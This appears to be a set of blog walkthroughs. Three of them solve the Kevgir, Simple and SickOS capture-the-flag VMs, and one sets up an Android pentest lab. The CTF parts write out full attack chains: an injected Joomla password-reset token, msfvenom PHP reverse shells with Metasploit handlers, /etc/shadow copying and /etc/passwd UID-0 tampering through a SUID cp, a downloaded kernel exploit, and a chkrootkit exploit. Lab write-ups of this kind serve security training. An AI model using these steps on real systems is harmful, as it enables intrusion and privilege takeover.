Hack the Kevgir VM (CTF Challenge)

In this article, we will walkthrough a root2boot penetration testing challenge i.e Kevgir. Kevgir is a vulnerable framework, based on the concept of CTF(Capture The Flag). This lab can be solved in multiple ways, one of them is used in this article.

Penetrating Methodologies

Network Scanning (Nmap, netdiscover)

Joomla based CMSScanning CMS (Joomscan)

Exploiting target (exploit 6234)

Login into the admin console

Generate PHP Backdoor (Msfvenom)

Upload and execute a backdoor

Reverse connection (Metasploit)

Import python one-liner for proper TTY shell

Find SUID Binaries for Privilege Escalation

Abusing shadow & password file

Get Root access and capture the flag.

Let’s Start!!!

First Download Kevgir Vm From Here

Start off with finding the target using :

netdiscover

Our target is 192.168.1.102 Now scan the target with nmap :

nmap -p- -A 192.168.1.102

With the nmap scan, you can see the ports 80, 139, 2049, 6379, 8080, 8081, 9000, 40383 and many others are open as you can see in the image.

Also, if you observe then you can see port forwarding is used here e.g. HTTP service is open on port number 80, 8080 and 8081. So, let us try open our target on 80 and 8081 port.

On port 80 Our target opens as the following:

And on port 8081 opens on :

The cms of the website are Joomla and this version of Joomla, as everyone knows, is exploitable. We will scan the said target with joomscan :

joomscan -u http://192.168.1.102:8081

Applying the joomscan will show all the vulnerable exploits. Here we can observe the highlighted text pointing towards “Admin Password changed” seems to be vulnerable against exploit 6234. Now if you look closely the exploit number 6234 will show you the steps to exploit the certain vulnerability.

According to the said, go for exploring the following URL:

 192.168.1.102:8081/index.php?optiona=com_user&view=reset&layout=confirm

Here, it will ask you for the token, type an apostrophe (‘) in the token adjacent text box.

It will redirect you to a page where it will ask you to set up a new password.

After setting up the new password, login with the username and the password that you had just set.

Now that you are logged in, go to the Extensions menu and select Template Manager from the drop-down menu.

Then choose Extensions > Template Manager > rhuk_milkway > Edit HTML.

Inside this, we can add our own PHP code but instead of editing genuine PHP for new template we will add malicious PHP code.

Create the malicious code that you are going to upload via msfvenom.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw

On other hand run multi/handler inside the Metasploit framework

Copy the code from >?php to die(); and Paste the code inside HTML editor and click on save button.

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.108

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation.

Meterpreter > sysinfo

Meterpreter > shell

Then to access proper TTY shell we had import python one line script by typing following:

python -c 'import pty;pty.spawn("/bin/bash")'

Now for privilege escalation either we can use find command to enumerate enabled SUID bit for any system binaries or we move into etc/bin to enumerate enabled SUID bit any binaries file.

find / -perm -u=s -type f 2>/dev/null

or

cd /etc/bin

ls -al

Hence we can clearly observe the SUID bit is set for cp for copy command, to copy any file which required higher privilege to perform read/write operation upon them such as etc/passwd & etc/shadow files.

Therefore we copied etc/shadow inside tmp and open it inside /tmp directory. The shadow files hold encrypted password of users and we are have copied the hash password for user: admin as shown.

Now we have pasted the above-copied text in an empty document and used John the ripper for cracking this hash value. As result, you can observe the password: admin for user: admin. This method is known as SUID binaries privilege escalation, for more detail read this article.

But the task is not completed yet, this boot to root challenge and still, we are lacking root privilege.  Now open the password file with help of cat where you will find an entry for admin. Now we know the admin user’s password and by manipulating his entries, we can increase his privileges and to do so copy the whole content of this file.

Paste it into an empty text file, now modify UID: 1002 & GID: 1002 into UID: 0 & GID: 0 for adding admin into root group member and saved as passwd so that we can replace original passwd file from our modified passwd file.

Download modified password file inside /tmp directory with help of wget as shown.

wget http://192.168.1.108/passwd

Now replace the content of original passwd file from our modified passwd file with help of copy command and it is possible due to SUID bit which is enabled for /bin/cp file. After then switch user with help of su command and you will get root access after that as shown below.

cp passwd /etc/

su admin

HURRAYYYY!!! We hit the Goal and finish this task. But this lab can be solved in multiple ways for example use kernel privilege escalation for privilege escalation.

Try it by yourself and enjoy the CTF challenges!!

Hack the Simple VM (CTF Challenge)

Simple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal. Therefore, in this article I will walk you through the whole method of completing this challenge.

First Download Simple VM from here

Breaching Methodology:

§  Network Scanning (Netdiscover, Nmap)

§  Enumerate File upload vulnerability (searchsploit)

§  Generate PHP Backdoor (Msfvenom)

§  Upload and execute a backdoor

§  Reverse connection (Metasploit)

§  Import python one-liner for proper TTY shell

§  Kernel Privilege Escalation

§  Get Root access and capture the flag.

We start by identifying our target with the following command :

netdiscover

Our target is 192.168.1.106

Then move on to scanning our target with nmap

nmap -A  192.168.1.106

On scanning, you will find that port 80 is open which will be pointing toward cutenews. So we will now open it on our browser.

Now we can see that our target is using CuteNews v.2.0.3 and the good news is it is exploitable, so let’s search for its exploit:

searchsploit cutenews 2.0.3

Upon searching for the exploit we can see that we have the path for the exploit. Follow the path and go to the exploit’s “.txt” file. In the text file you find the instructions to upload the file. First thing it tells us to register on the website in order to have the power to upload a file.

To register it will ask you to give your username and password as shown below.

When you complete the steps of registering them, it will redirect you to the following window:

Now we need to upload the file so make it with the help of msfvenom following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw

On other hand run multi/handler inside Metasploit framework.

Copy the code from and save it in a file with .php extension. To upload the file log in from the username with which you have just registered and then click on personal options give your username and mail ID and then browse the file that you want to upload and then click on save.

Now we will use dirb to find the directories. And for that type:

dirb hhtp://192.168.1.106

It will show you /uploads directory. This is the directory where your file will be uploaded. Open the directory in the browser and you find your uploaded file there.

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.108

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But task is not finished yet, still we need to penetrate more for privilege escalation.

shell

And if you type the combination of two following commands to import the python file to reach the terminal then it will not work as the version of python is updated:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

cd /tmp

Using sysinfo command I came know machine architecture that helps me to find out a kernel exploit for privilege escalation and with help of Google search, we got an exploit 36746.

As we know that version of the kernel is vulnerable, consequently we will download its exploit by the command as given below:
wget https//www.exploit-db.com/download/36746

This will install the exploit successfully. Moving forward, we will compile the file:

gcc 36746.c -o access -static

Now we will open the file access:

./access

Then type id to know the users and then type:

cd /root

and will take you into the /root. Further type:

ls

It will list the files and one of those files will be flag.txt. To read the flag type:

cat flag.txt

Hack the SickOS 2.1 VM (CTF Challenge)

In this walk through I will explain how to solve the SickOs 1.2 challenge. This OS is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system. This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it in a safe environment.

First Download Sick OS from Here

Breaching Methodology:

·         Network Scanning (Netdiscover, Nmap)

·         Directory brute-force (dirb)

·         Find HTTP Options: PUT (curl)

·         Generate PHP Backdoor (Msfvenom)

·         Install Poster (Firefox plug-in)

·         Upload and execute a backdoor

·         Reverse connection (Metasploit)

·         Privilege Escalation (cron job)

·         Import python one-liner for proper TTY shell

·         Get Root access and capture the flag.

Let’s start!!

So, first let us find our target by using :

netdiscover

Our target is 192.168.1.109 Further we will apply nmap scan:

nmap -A  192.168.1.109

As you can see that port 80 is open that means we can open this IP in the browser. Why not do that?

Opening the IP in the browser will show us the above image which is of no use. You can try and look into the page source but unfortunately you will find nothing there. That is why we will use dirb and to find the directories. And for that type:

dirb http://192.168.1.109

As a result you can see we have found our directory i.e. test Open it in the browser as well.

192.168.1.109/test/

It will show you the list of directories. So let us try and explore test directory via curl.

curl -v -X OPTIONS http://192.168.1.109/test

This exploring will show you that PUT is allowed that means you can upload any file through it.

So, prepare the malicious file that you would upload with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=443 -f raw

On other hand run multi/handler inside Metasploit framework.

Copy the code from  to die(); and paste it to a text file with the extension .php for example shell.php and ready to upload the said file.

Now to upload your .php file we will use the add-on poster. Click on the tools from the menu bar. And then click on Poster from the drop down menu. A following dialog box will open. Here, browse the file that you will upload and click on PUT option.

It will show you that the file is uploaded

And you can see the same on your browser that you file will be uploaded (as in our case the file is shell.php) now run the file you just uploaded.

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.108

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session1. But task is not finished yet, still we need to penetrate more for privilege escalation.

Then I check for cron jobs from inside /etc/crontab and here found some schedule jobs.

Moving further type the following to explore more and find something to be exploitable:

ls -l /etc/cron.daily

The above command will give you the list of the files. On observing you can see that there is chkrootkit. Some of its version are exploitable therefore we will check its version and for that type:

chkrootkit -V

It will show you the version which is 0.49

With help of Google we came know that metasploit contains an exploit for chkrootkit exploitation. After enter following command as shown in given image to load exploit/unix/local/chkrootkit module then set session 1 and arbitrary lport such as 8080 and run the module.

This will give another session, as you can see we have spawned command shell of target’s machine. Now if you will check uid by typing id it will show uid=0 as root.

id

cd /root

And to see the list of files in /root type :

ls -lsa

In the list you will see that there is a text file and to read that file type :

cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt

  

Build an Android Penetration Testing lab

Nowadays mobile user’s area unit increasing day by day, the protection threat is also increasing along with the expansion of its users. These threats can disrupt the operation of the smart phone, and transmit or modify user data. For these reasons, the applications deployed there should ensure privacy and integrity of the info they manage. Mobile security involves protecting personal and business information continues and transmitted from good phones, tablets, laptops and totally different mobile devices. Mobile security has become very important in mobile computing as a result of the day these days increase inside the delicate attack methods.  So, now we will see how to exploit and analyze the android application for vulnerability.

So first we have to setup an environment for android application testing.

Requirements for android penetration testing:

·         Virtual Box

·         Santoku OS which come with preinstalled SDKs.

·         GenyMotion for creating Android Virtual Device ( AVD)

·         A vulnerable android app “InsecureBankv2”.

Let’s start…

So first download Santoku OS from here. Santoku OS is built especially for Mobile penetration testing and forensic investigation. Santoku comes with pre-installed SDKs and other utilities. There is a bunch of forensic tools also like firmware flashing tools for multiple vendors, some other forensic scripts for enumerating app details, etc.

After downloading Santoku open Virtual Box and create a new virtual machine for it.

Now select RAM for Santoku VM, recommended is 786MB but I took 2GB, you can select according to your own need and click NEXT.

In this section select hard disk type as per your need or select VMDK (Virtual Machine Disk)

Here select the size of the hard disk as you wish and then create VM.

Now for installing Santoku tou our created VM right click on Santoku VM and go to settings  Storage  then select the empty disk after click on disk icon just in front of optical drive in the attribute section and then browse and select the downloaded santoku iso file and click Okay.

Finally launch that VM and after few seconds santoku boot menu will appear select “Install- start th installer directly”

Now installation process will begin, select your preferred language then click on continue after click on Install now.

Select your preferred language for the keyboard.

Now in this section name your VM and set a strong password for login access you can also chose Login automatically but it’s not a good choice

Now santoku will start copying files and installing. Now sit back and wait for few minutes after that it will restart.

Here our Santoku is installed that means our first part is completed.

 Now you can download Genymotion from here .

Basically, Genymotion is a relatively fast Android emulator which comes with pre-configured Android with OpenGL hardware acceleration suitable for application testing.

After installing Genymotion, go to https://www.genymotion.com/account/create/  and create a free account there and verify your email ID. Then come back to genymotion desktop software and login there using newly created account credentials.

Now to create an AVD click on ‘Add’ a new menu will appear where you can select android devices according to device brands and version numbers.

Select the device according to your need and click next. Then in this sections your review the configuration of android mobile device and finally create virtual device.

Now the device will start download the data and deploy the virtual android device.

Here you can see I created 2 virtual devices. Now select the devices and launch it.

Here is our Android Virtual Device.

To test our application for any kind of vulnerability we need Android SDK because in our testing phase we will be going to use ADB (Android Debugger Bridge) command line almost every time.  And Android SDK is preinstalled in Santoku OS. So, now we are going to connect santoku to our Android Virtual Device.

Fists check the IP of Android Virtual Device.

Now open command line in Santoku and type:

adb connect

You can check whether device is connected or not by typing:

adb devices

So here we can see that list is showing that 1 device connected.

And here you can also run shell to enter in android mobile by typing:

adb shell

So here creating penetration testing lab for android application is completed now stay tuned for next article on actual android app penetration testing and hacking.